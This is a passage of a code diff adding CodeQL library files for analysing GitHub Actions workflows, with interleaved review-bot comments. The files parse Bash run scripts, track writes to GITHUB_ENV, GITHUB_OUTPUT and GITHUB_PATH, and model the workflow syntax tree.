+ regexp = ".*\\$\\{([a-zA-Z_][a-zA-Z0-9_]*)([#%/:^,\\-+]{1,2})?(.*?)\\}.*" and + parameter = expr.regexpCapture(regexp, 1) and + operator = expr.regexpCapture(regexp, 2) and + params = expr.regexpCapture(regexp, 3) + ) + } + + bindingset[raw_content] + predicate extractVariableAndValue(string raw_content, string key, string value) { + exists(string regexp, string content | content = trimQuotes(raw_content) | + regexp = "(?msi).*^([a-zA-Z_][a-zA-Z0-9_]*)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\2\\s*$" and + key = trimQuotes(content.regexpCapture(regexp, 1)) and + value = trimQuotes(content.regexpCapture(regexp, 3)) + or + exists(string line | + line = content.splitAt("\n") and + regexp = "(?i)^([a-zA-Z_][a-zA-Z0-9_\\-]*)\\s*=\\s*(.*)$" and + key = trimQuotes(line.regexpCapture(regexp, 1)) and + value = trimQuotes(line.regexpCapture(regexp, 2)) + ) + ) + } + + bindingset[script] + predicate singleLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + exists(string regexp | + regexp = "(?i)(echo|printf)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" and + content = script.regexpCapture(regexp, 2) + ) + } + + bindingset[script] + predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { + exists(string regexp | + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = script.regexpCapture(regexp, 4) and + value = trimQuotes(script.regexpCapture(regexp, 5)) + or + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + cmd = script.regexpCapture(regexp, 3) and + key = "" and + value = trimQuotes(script.regexpCapture(regexp, 4)) + ) + } + + bindingset[script] + predicate heredocFileWrite(string script, string cmd, string file, string content, string filters) { + 
exists(string regexp | + regexp = + "(?msi).*^(cat)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*<<\\s*['\"]?(\\S+)['\"]?\\s*\n(.*?)\n\\4\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 4)) and + content = script.regexpCapture(regexp, 6) and + filters = "" + or + regexp = + "(?msi).*^(cat)\\s*(<<|<)\\s*[-]?['\"]?(\\S+)['\"]?\\s*([^>]*)(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)\\s*\n(.*?)\n\\3\\s*$.*" and + cmd = script.regexpCapture(regexp, 1) and + file = trimQuotes(script.regexpCapture(regexp, 7)) and + filters = script.regexpCapture(regexp, 4) and + content = script.regexpCapture(regexp, 8) + ) + } + + bindingset[script] + predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string var_name | + regexp = + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + var_name = trimQuotes(script.regexpCapture(regexp, 3)).regexpReplaceAll("<<\\s*(\\S+)", "") and + content = + var_name + "=$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + .regexpReplaceAll(">>.*GITHUB_(ENV|OUTPUT)(})?", "") + .trim() + ")" and + cmd = "echo" and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + filters = "" + ) + } + + bindingset[script] + predicate blockFileWrite(string script, string cmd, string file, string content, string filters) { + exists(string regexp, string first_line, string var_name | + regexp = + "(?msi).*^\\s*\\{\\s*[\r\n]" + + // + "(.*?)" + + // + "(\\s*\\}\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+))\\s*$.*" and + first_line = script.regexpCapture(regexp, 1).splitAt("\n", 0).trim() and + var_name = first_line.regexpCapture("echo\\s+('|\\\")?(.*)<<.*", 2) and + content = var_name + "=$(" + script.regexpCapture(regexp, 1).splitAt("\n").trim() + ")" and + not 
content.indexOf("EOF") > 0 and + file = trimQuotes(script.regexpCapture(regexp, 5)) and + cmd = "echo" and + filters = "" + ) + } + + bindingset[script] + predicate multiLineFileWrite( + string script, string cmd, string file, string content, string filters + ) { + heredocFileWrite(script, cmd, file, content, filters) + or + linesFileWrite(script, cmd, file, content, filters) + or + blockFileWrite(script, cmd, file, content, filters) + } + + bindingset[file_var] + predicate extractFileWrite(BashShellScript script, string file_var, string content) { + // single line assignment + exists(string file_expr, string raw_content | + isParameterExpansion(file_expr, file_var, _, _) and + singleLineFileWrite(script.getAStmt(), _, file_expr, raw_content, _) and + content = trimQuotes(raw_content) + ) + or + // workflow command assignment + exists(string key, string value, string cmd | + ( + file_var = "GITHUB_ENV" and + cmd = "set-env" and + content = key + "=" + value + or + file_var = "GITHUB_OUTPUT" and + cmd = "set-output" and + content = key + "=" + value + or + file_var = "GITHUB_PATH" and + cmd = "add-path" and + content = value + ) and + singleLineWorkflowCmd(script.getAStmt(), cmd, key, value) + ) + or + // multiline assignment + exists(string file_expr, string raw_content | + multiLineFileWrite(script.getRawScript(), _, file_expr, raw_content, _) and + isParameterExpansion(file_expr, file_var, _, _) and + content = trimQuotes(raw_content) + ) + } + + /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ + predicate fileToFileWrite(BashShellScript script, string file_var, string path) { + exists(string regexp, string stmt, string file_expr | + regexp = + "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and + stmt = script.getAStmt() and + file_expr = trimQuotes(stmt.regexpCapture(regexp, 5)) and + path = stmt.regexpCapture(regexp, 2) and + 
containsParameterExpansion(file_expr, file_var, _, _) + ) + } + + /** + * Holds if the Run scripts contains an access to an environment variable called `var` + * which value may get appended to the GITHUB_XXX special file + */ + predicate envReachingGitHubFileWrite( + BashShellScript script, string var, string file_var, string field + ) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + script.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + script.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = "GITHUB_PATH" and + field = "PATH" and + script.getAWriteToGitHubPath(file_write_value) + ) and + envReachingRunExpr(script, var, file_write_value) + ) + } + + /** + * Holds if and environment variable is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. + */ + bindingset[expr] + predicate envReachingRunExpr(BashShellScript script, string var, string expr) { + exists(string var2, string value2 | + // VAR2=${VAR:-default} (var2=value2) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + script.getAnAssignment(var2, value2) and + containsParameterExpansion(value2, var, _, _) and + containsParameterExpansion(expr, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=${VAR:-default}" >> $GITHUB_ENV (field, file_write_value) + containsParameterExpansion(expr, var, _, _) + } + + /** + * Holds if the Run scripts contains a command substitution (`cmd`) + * which output may get appended to the GITHUB_XXX special file + */ + predicate cmdReachingGitHubFileWrite( + BashShellScript script, string cmd, string file_var, string field + ) { + exists(string file_write_value | + ( + file_var = "GITHUB_ENV" and + script.getAWriteToGitHubEnv(field, file_write_value) + or + file_var = "GITHUB_OUTPUT" and + script.getAWriteToGitHubOutput(field, file_write_value) + or + file_var = 
"GITHUB_PATH" and + field = "PATH" and + script.getAWriteToGitHubPath(file_write_value) + ) and + cmdReachingRunExpr(script, cmd, file_write_value) + ) + } + + predicate envReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and + envReachingRunExpr(script, source, argument) + ) + } + + predicate cmdReachingArgumentInjectionSink( + BashShellScript script, string source, string command, string argument + ) { + exists(string cmd, string regex, int command_group, int argument_group | + cmd = script.getACommand() and + argumentInjectionSinksDataModel(regex, command_group, argument_group) and + argument = cmd.regexpCapture(regex, argument_group).trim() and + command = cmd.regexpCapture(regex, command_group).trim() and + cmdReachingRunExpr(script, source, argument) + ) + } + + /** + * Holds if a command output is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. 
+ */ + bindingset[expr] + predicate cmdReachingRunExpr(BashShellScript script, string cmd, string expr) { + // cmd output is assigned to a second variable (var2) and var2 reaches the file write + exists(string var2, string value2 | + // VAR2=$(cmd) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + script.getAnAssignment(var2, value2) and + containsCmdSubstitution(value2, cmd) and + containsParameterExpansion(expr, var2, _, _) and + not varMatchesRegexTest(script, var2, alphaNumericRegex()) + ) + or + // var reaches the file write directly + // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) + containsCmdSubstitution(expr, cmd) + } + + /** + * Holds if there test command that checks a variable against a regex + * eg: `[[ $VAR =~ ^[a-zA-Z0-9_]+$ ]]` + */ + bindingset[var, regex] + predicate varMatchesRegexTest(BashShellScript script, string var, string regex) { + exists(string lhs, string rhs | + lhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 1) and + containsParameterExpansion(lhs, var, _, _) and + rhs = script.getACommand().regexpCapture(".*\\[\\[\\s*(.*?)\\s*=~\\s*(.*?)\\s*\\]\\].*", 2) and + trimQuotes(rhs).regexpMatch(regex) + ) + } + + /** + * Holds if the given regex is used to match an alphanumeric string + * eg: `^[0-9a-zA-Z]{40}$`, `^[0-9]+$` or `^[a-zA-Z0-9_]+$` + */ + string alphaNumericRegex() { result = "^\\^\\[([09azAZ_-]+)\\](\\+|\\{\\d+\\})\\$$" } +} diff --git a/actions/ql/lib/codeql/actions/Cfg.qll b/actions/ql/lib/codeql/actions/Cfg.qll new file mode 100644 index 000000000000..8ccc8de1d445 --- /dev/null +++ b/actions/ql/lib/codeql/actions/Cfg.qll @@ -0,0 +1,6 @@ +/** Provides classes representing the control flow graph. */ + +private import codeql.actions.controlflow.internal.Cfg as CfgInternal +import CfgInternal::Completion +import CfgInternal::CfgScope +import CfgInternal::CfgImpl 
diff --git a/actions/ql/lib/codeql/actions/Consistency.ql b/actions/ql/lib/codeql/actions/Consistency.ql
new file mode 100644
index 000000000000..a799ffce3a3a
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/Consistency.ql
@@ -0,0 +1 @@
+import DataFlow::DataFlow::Consistency
diff --git a/actions/ql/lib/codeql/actions/DataFlow.qll b/actions/ql/lib/codeql/actions/DataFlow.qll
new file mode 100644
index 000000000000..feafe4f68bb0
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/DataFlow.qll
@@ -0,0 +1,22 @@
+/**
+ * Provides classes for performing local (intra-procedural) and
+ * global (inter-procedural) data flow analyses.
+ */
+
+import codeql.Locations
+
+module DataFlow {
+ private import codeql.dataflow.DataFlow
+ private import codeql.actions.dataflow.internal.DataFlowImplSpecific
+ import DataFlowMake
+ import codeql.actions.dataflow.internal.DataFlowPublic
+ // debug
+ private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific
+ import codeql.dataflow.internal.DataFlowImplConsistency as DFIC
+
+ module ActionsConsistency implements DFIC::InputSig { }
+
+ module Consistency {
+ import DFIC::MakeConsistency
+ }
+}
diff --git a/actions/ql/lib/codeql/actions/Helper.qll b/actions/ql/lib/codeql/actions/Helper.qll
new file mode 100644
index 000000000000..48b70061ec0f
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/Helper.qll
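Review bot: The `// debug` comment on `private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific` in DataFlow.qll reads as a leftover rather than an explanation, and it is the only documentation for why a taint-tracking module is imported into `DataFlow`. If the import is needed by the `Consistency` module, say so, e.g. `// Needed by the Consistency module below`; otherwise drop it. `ActionsConsistency` implements `DFIC::InputSig` but nothing in the hunk references it, so either `Consistency` is meant to take it as a parameter or the empty module is dead code; a one-line comment stating which is intended would help the next reader.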
@@ -0,0 +1,88 @@
+private import codeql.actions.Ast
+private import codeql.Locations
+private import codeql.actions.security.ControlChecks
+import codeql.actions.config.Config
+import codeql.actions.Bash
+import codeql.actions.PowerShell
+
+bindingset[expr]
+string normalizeExpr(string expr) {
+ result =
+ expr.regexpReplaceAll("\\['([a-zA-Z0-9_\\*\\-]+)'\\]", ".$1")
+ .regexpReplaceAll("\\[\"([a-zA-Z0-9_\\*\\-]+)\"\\]", ".$1")
+ .regexpReplaceAll("\\s*\\.\\s*", ".")
+}
+
+bindingset[regex]
+string wrapRegexp(string regex) { result = "\\b" + regex + "\\b" }
+
+bindingset[regex]
+string wrapJsonRegexp(string regex) {
+ result = ["fromJSON\\(\\s*" + regex + "\\s*\\)", "toJSON\\(\\s*" + regex + "\\s*\\)"]
+}
+
+bindingset[str]
+string trimQuotes(string str) {
+ result = str.trim().regexpReplaceAll("^(\"|')", "").regexpReplaceAll("(\"|')$", "")
+}
+
+predicate inPrivilegedContext(AstNode node, Event event) {
+ node.getEnclosingJob().isPrivilegedExternallyTriggerable(event)
+}
+
+predicate inNonPrivilegedContext(AstNode node) {
+ not node.getEnclosingJob().isPrivilegedExternallyTriggerable(_)
+}
+
+string defaultBranchNames() {
+ repositoryDataModel(_, result)
+ or
+ not exists(string default_branch_name | repositoryDataModel(_, default_branch_name)) and
+ result = ["main", "master"]
+}
+
+string getRepoRoot() {
+ exists(Workflow w |
+ w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and
+ result =
+ w.getLocation()
+ .getFile()
+ .getRelativePath()
+ .prefix(w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") + 1) and
+ // exclude workflow_enum reusable workflows directory root
+ not result.indexOf(".github/workflows/external/") > -1 and
+ not result.indexOf(".github/actions/external/") > -1
+ or
+ not w.getLocation().getFile().getRelativePath().indexOf("/.github/workflows") > 0 and
+ not w.getLocation().getFile().getRelativePath().indexOf(".github/workflows/external/") > -1 and
+ not w.getLocation().getFile().getRelativePath().indexOf(".github/actions/external/") > -1 and
+ result = ""
+ )
+}
+
+bindingset[path]
+string normalizePath(string path) {
+ exists(string trimmed_path | trimmed_path = trimQuotes(path) |
+ // ./foo -> GITHUB_WORKSPACE/foo
+ if path.indexOf("./") = 0
+ then result = path.replaceAll("./", "GITHUB_WORKSPACE/")
+ else
+ // GITHUB_WORKSPACE/foo -> GITHUB_WORKSPACE/foo
+ if path.indexOf("GITHUB_WORKSPACE/") = 0
+ then result = path
+ else
+ // foo -> GITHUB_WORKSPACE/foo
+ if path.regexpMatch("^[^/~].*")
+ then result = "GITHUB_WORKSPACE/" + path.regexpReplaceAll("/$", "")
+ else
+ // ~/foo -> ~/foo
+ // /foo -> /foo
+ result = path
+ )
+}
+
+/**
+ * Holds if the path cache_path is a subpath of the path untrusted_path.
+ */
+bindingset[subpath, path]
+predicate isSubpath(string subpath, string path) { subpath.substring(0, path.length()) = path }
diff --git a/actions/ql/lib/codeql/actions/PowerShell.qll b/actions/ql/lib/codeql/actions/PowerShell.qll
new file mode 100644
index 000000000000..3ae706970fa7
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/PowerShell.qll
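Review bot: In `normalizePath`, `trimmed_path` is bound from `trimQuotes(path)` but never used — every branch tests and returns `path`, so a quoted value such as `"./foo"` misses the first two branches and comes back as `GITHUB_WORKSPACE/"./foo"`. The first branch also rewrites every `./` in the string rather than only the leading one (`./a/./b` becomes `GITHUB_WORKSPACE/a/GITHUB_WORKSPACE/b`); using `trimmed_path` in all four branches and anchoring the replacement, `then result = trimmed_path.regexpReplaceAll("^\\./", "GITHUB_WORKSPACE/")`, fixes both. `isSubpath` at the end of the file is a plain string-prefix test, so `GITHUB_WORKSPACE/foobar` is accepted as a subpath of `GITHUB_WORKSPACE/foo`; wherever it gates a trust decision it should also require the match to end on a `/` boundary (for example by comparing against `path` with a trailing `/` appended). Its QLDoc names `cache_path` and `untrusted_path`, but the parameters are `subpath` and `path`; the comment should use the real names.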
@@ -0,0 +1,62 @@
+private import codeql.actions.Ast
+
+class PowerShellScript extends ShellScript {
+ PowerShellScript() {
+ exists(Run run |
+ this = run.getScript() and
+ run.getShell().matches("pwsh%")
+ )
+ }
+
+ override string getStmt(int i) { none() }
+
+ override string getAStmt() { none() }
+
+ override string getCommand(int i) { none() }
+
+ override string getACommand() { none() }
+
+ override string getFileReadCommand(int i) { none() }
+
+ override string getAFileReadCommand() { none() }
+
+ override predicate getAssignment(int i, string name, string data) { none() }
+
+ override predicate getAnAssignment(string name, string data) { none() }
+
+ override predicate getAWriteToGitHubEnv(string name, string data) { none() }
+
+ override predicate getAWriteToGitHubOutput(string name, string data) { none() }
+
+ override predicate getAWriteToGitHubPath(string data) { none() }
+
+ override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { none() }
+
+ override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { none() }
+
+ override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { none() }
+
+ override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { none() }
+
+ override predicate getAnEnvReachingGitHubPathWrite(string var) { none() }
+
+ override predicate getACmdReachingGitHubPathWrite(string cmd) { none() }
+
+ override predicate getAnEnvReachingArgumentInjectionSink(
+ string var, string command, string argument
+ ) {
+ none()
+ }
+
+ override predicate getACmdReachingArgumentInjectionSink(
+ string cmd, string command, string argument
+ ) {
+ none()
+ }
+
+ override predicate fileToGitHubEnv(string path) { none() }
+
+ override predicate fileToGitHubOutput(string path) { none() }
+
+ override predicate fileToGitHubPath(string path) { none() }
+}
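Review bot: `PowerShellScript` has no QLDoc, and since every override in the class is `none()`, a `pwsh` run step yields no statements, assignments, GITHUB_ENV/GITHUB_OUTPUT/GITHUB_PATH writes or argument-injection sinks — a reader of `ShellScript` will not expect that from the type name alone. A class comment should state it, e.g. `/** A `run:` script executed with `shell: pwsh`. Parsing is not implemented yet: every accessor is empty, so queries built on `ShellScript` report nothing for these steps. */`. The constructor only recognises `pwsh%`; if `shell: powershell` (the Windows Desktop PowerShell value) is meant to be covered as well, the match would need `run.getShell().matches(["pwsh%", "powershell%"])`, and if not, the comment should say that such steps belong to no script class at all.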
diff --git a/actions/ql/lib/codeql/actions/TaintTracking.qll b/actions/ql/lib/codeql/actions/TaintTracking.qll
new file mode 100644
index 000000000000..8203a54dfebd
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/TaintTracking.qll
@@ -0,0 +1,13 @@
+/**
+ * Provides classes for performing local (intra-procedural) and
+ * global (inter-procedural) taint-tracking analyses.
+ */
+
+import codeql.Locations
+
+module TaintTracking {
+ private import codeql.actions.dataflow.internal.DataFlowImplSpecific
+ private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific
+ private import codeql.dataflow.TaintTracking
+ import TaintFlowMake
+}
diff --git a/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll b/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll
new file mode 100644
index 000000000000..9bd9bd34dd44
--- /dev/null
+++ b/actions/ql/lib/codeql/actions/Violations Of Best Practices/DefaultableCodeQLInitiatlizeActionQuery.qll
@@ -0,0 +1,32 @@
+private import actions
+
+/**
+ * Holds if workflow step uses the github/codeql-action/init action with no customizations.
+ * e.g.
+ * - name: Initialize
+ * uses: github/codeql-action/init@v2
+ * with:
+ * languages: ruby, javascript
+ */
+class DefaultableCodeQLInitiatlizeActionQuery extends UsesStep {
+ DefaultableCodeQLInitiatlizeActionQuery() {
+ this.getCallee() = "github/codeql-action/init" and
+ not customizedWorkflowStep(this)
+ }
+}
+
+/**
+ * Holds if the with: part of the workflow step contains any arguments for with: other than "languages".
+ * e.g.
+ * - name: Initialize CodeQL
+ * uses: github/codeql-action/init@v3
+ * with:
+ * languages: ${{ matrix.language }}
+ * config-file: ./.github/codeql/${{ matrix.language }}/codeql-config.yml
+ */
+predicate customizedWorkflowStep(UsesStep codeQLInitStep) {
+ exists(string arg |
+ exists(codeQLInitStep.getArgument(arg)) and
+ arg != "languages"
+ )
+}
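Review bot: The QLDoc on `DefaultableCodeQLInitiatlizeActionQuery` is phrased as a predicate description ("Holds if workflow step uses ...") but it documents a class; a noun phrase is what the generated library docs expect, e.g. `/** A `uses:` step that calls github/codeql-action/init with no `with:` argument other than `languages`. */`. The class name and file name also spell "Initialize" as "Initiatlize"; this initial release is the cheapest moment to rename them before the identifier becomes public API. The comparison `this.getCallee() = "github/codeql-action/init"` presumably relies on `getCallee()` stripping the `@ref` suffix, since the examples in the comment use `@v2` and `@v3`; worth confirming against `UsesStep` and noting in the comment.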
diff --git a/actions/ql/lib/codeql/actions/ast/internal/Ast.qll b/actions/ql/lib/codeql/actions/ast/internal/Ast.qll new file mode 100644 index 000000000000..b0cbb8a1d79e --- /dev/null +++ b/actions/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -0,0 +1,1924 @@ +private import codeql.actions.ast.internal.Yaml +private import codeql.Locations +private import codeql.actions.Helper +private import codeql.actions.config.Config +private import codeql.actions.DataFlow + +bindingset[text] +int numberOfLines(string text) { result = max(int i | exists(text.splitAt("\n", i))) } + +/** + * Gets the length of each line in the StringValue . + */ +bindingset[text] +int lineLength(string text, int i) { result = text.splitAt("\n", i).length() + 1 } + +/** + * Gets the sum of the length of the lines up to the given index. + */ +bindingset[text] +int partialLineLengthSum(string text, int i) { + i in [0 .. numberOfLines(text)] and + result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) +} + +string getADelimitedExpression(YamlString s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.getValue() + .regexpFind("\\$\\{\\{(?:[^}]|}(?!}))*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{(?:[^}]|}(?!}))*\\}\\})", 1) + .trim() +} + +private newtype TAstNode = + TExpressionNode(YamlNode key, YamlScalar value, string raw, int exprOffset) { + raw = getADelimitedExpression(value, exprOffset) and + exists(YamlMapping m | + ( + exists(int i | value = m.getValueNode(i) and key = m.getKeyNode(i)) + or + exists(int i | + m.getValueNode(i).(YamlSequence).getElementNode(_) = value and key = m.getKeyNode(i) + ) + ) + ) + or + // `if`'s conditions do not need to be delimted with ${{}} + exists(YamlMapping m | + m.maps(key, value) and + key.(YamlScalar).getValue() = ["if"] and + value.getValue() = raw and + exprOffset = 1 + ) + } or + TCompositeAction(YamlMapping n) { + n instanceof YamlDocument and + n.getFile().getBaseName() = ["action.yml", "action.yaml"] and + n.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } or + TWorkflowNode(YamlMapping n) { + n 
instanceof YamlDocument and + n.lookup("jobs") instanceof YamlMapping + } or + TRunsNode(YamlMapping n) { exists(CompositeActionImpl a | a.getNode().lookup("runs") = n) } or + TDefaultsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("defaults") = n) } or + TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or + TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or + TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or + TPermissionsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("permissions") = n) } or + TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or + TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or + TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or + TOnNode(YamlMappingLikeNode n) { exists(YamlMapping w | w.lookup("on") = n) } or + TEventNode(YamlScalar event, YamlMappingLikeNode n) { + exists(OnImpl o | + o.getNode().(YamlMapping).maps(event, n) + or + o.getNode().(YamlSequence).getAChildNode() = event and event = n + or + o.getNode().(YamlScalar) = n and event = n + ) + } or + TStepNode(YamlMapping n) { + exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) + } or + TIfNode(YamlValue n) { exists(YamlMapping m | m.lookup("if") = n) } or + TEnvironmentNode(YamlValue n) { exists(YamlMapping m | m.lookup("environment") = n) } or + TEnvNode(YamlMapping n) { exists(YamlMapping m | m.lookup("env") = n) } or + TScalarValueNode(YamlScalar n) { + exists(YamlMapping m | m.maps(_, n) or m.lookup(_).(YamlSequence).getElementNode(_) = n) + } + +abstract class AstNodeImpl extends TAstNode { + abstract AstNodeImpl getAChildNode(); + + abstract AstNodeImpl getParentNode(); + + abstract string getAPrimaryQlClass(); + + abstract Location getLocation(); + + abstract YamlNode getNode(); + + abstract string 
toString(); + + /** + * Gets the enclosing Job. + */ + JobImpl getEnclosingJob() { + result.getAChildNode*() = this.getParentNode() or + result = this.getEnclosingCompositeAction().getACallerJob() + } + + /** + * Gets and Event triggering this node. + */ + EventImpl getATriggerEvent() { + result = this.getEnclosingJob().getATriggerEvent() + or + not exists(this.getEnclosingJob()) and result = this.getEnclosingWorkflow().getATriggerEvent() + } + + /** + * Gets the enclosing Step. + */ + StepImpl getEnclosingStep() { + if this instanceof StepImpl + then result = this + else + if this instanceof ScalarValueImpl + then result.getAChildNode*() = this.getParentNode() + else none() + } + + /** + * Gets the enclosing workflow if any. + */ + WorkflowImpl getEnclosingWorkflow() { this = result.getAChildNode*() } + + /** + * Gets the enclosing composite action if any. + */ + CompositeActionImpl getEnclosingCompositeAction() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current node. 
+ */ + ExpressionImpl getInScopeEnvVarExpr(string name) { + exists(EnvImpl env | + env.getNode().maps(any(YamlScalar s | s.getValue() = name), result.getParentNode().getNode()) and + env.getParentNode().getAChildNode*() = this + ) + } + + ScalarValueImpl getInScopeDefaultValue(string name, string prop) { + exists(DefaultsImpl dft | + this.getEnclosingJob().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + or + not exists(DefaultsImpl dft | this.getEnclosingJob() = dft.getParentNode()) and + exists(DefaultsImpl dft | + this.getEnclosingWorkflow().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + } +} + +class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { + YamlScalar value; + + ScalarValueImpl() { this = TScalarValueNode(value) } + + override string toString() { result = value.getValue() } + + override ExpressionImpl getAChildNode() { result.getParentNode() = this } + + override AstNodeImpl getParentNode() { + exists(AstNodeImpl n | n.getAChildNode() = this and result = n) + } + + override string getAPrimaryQlClass() { result = "ScalarValueImpl" } + + override Location getLocation() { result = value.getLocation() } + + override YamlScalar getNode() { result = value } + + string getValue() { result = value.getValue() } +} + +class ShellScriptImpl extends ScalarValueImpl { + ShellScriptImpl() { exists(YamlMapping run | run.lookup("run").(YamlScalar) = this.getNode()) } + + string getRawScript() { result = this.getValue().regexpReplaceAll("\\\\\\s*\n", "") } + + RunImpl getEnclosingRun() { result.getNode().lookup("run") = this.getNode() } + + abstract string getStmt(int i); + + abstract string getAStmt(); + + abstract string getCommand(int i); + + string getACommand() { + if this.getEnclosingRun().getShell().matches("bash%") + then result = this.(BashShellScript).getACommand() + else + if this.getEnclosingRun().getShell().matches("pwsh%") + then result = 
this.(PowerShellScript).getACommand() + else result = "NOT IMPLEMENTED" + } + + abstract string getFileReadCommand(int i); + + abstract string getAFileReadCommand(); + + abstract predicate getAssignment(int i, string name, string data); + + abstract predicate getAnAssignment(string name, string data); + + abstract predicate getAWriteToGitHubEnv(string name, string data); + + abstract predicate getAWriteToGitHubOutput(string name, string data); + + abstract predicate getAWriteToGitHubPath(string data); + + abstract predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field); + + abstract predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field); + + abstract predicate getAnEnvReachingGitHubPathWrite(string var); + + abstract predicate getACmdReachingGitHubPathWrite(string cmd); + + abstract predicate getAnEnvReachingArgumentInjectionSink( + string var, string command, string argument + ); + + abstract predicate getACmdReachingArgumentInjectionSink( + string cmd, string command, string argument + ); + + abstract predicate fileToGitHubEnv(string path); + + abstract predicate fileToGitHubOutput(string path); + + abstract predicate fileToGitHubPath(string path); +} + +class ExpressionImpl extends AstNodeImpl, TExpressionNode { + YamlNode key; + YamlString value; + string rawExpression; + string fullExpression; + int exprOffset; + + ExpressionImpl() { + this = TExpressionNode(key, value, rawExpression, exprOffset - 1) and + if rawExpression.trim().regexpMatch("\\$\\{\\{.*\\}\\}") + then + fullExpression = rawExpression.trim().regexpCapture("\\$\\{\\{\\s*(.*)\\s*\\}\\}", 1).trim() + else fullExpression = rawExpression.trim() + } + + override string toString() { result = fullExpression } + + override AstNodeImpl getAChildNode() { none() } + + override ScalarValueImpl 
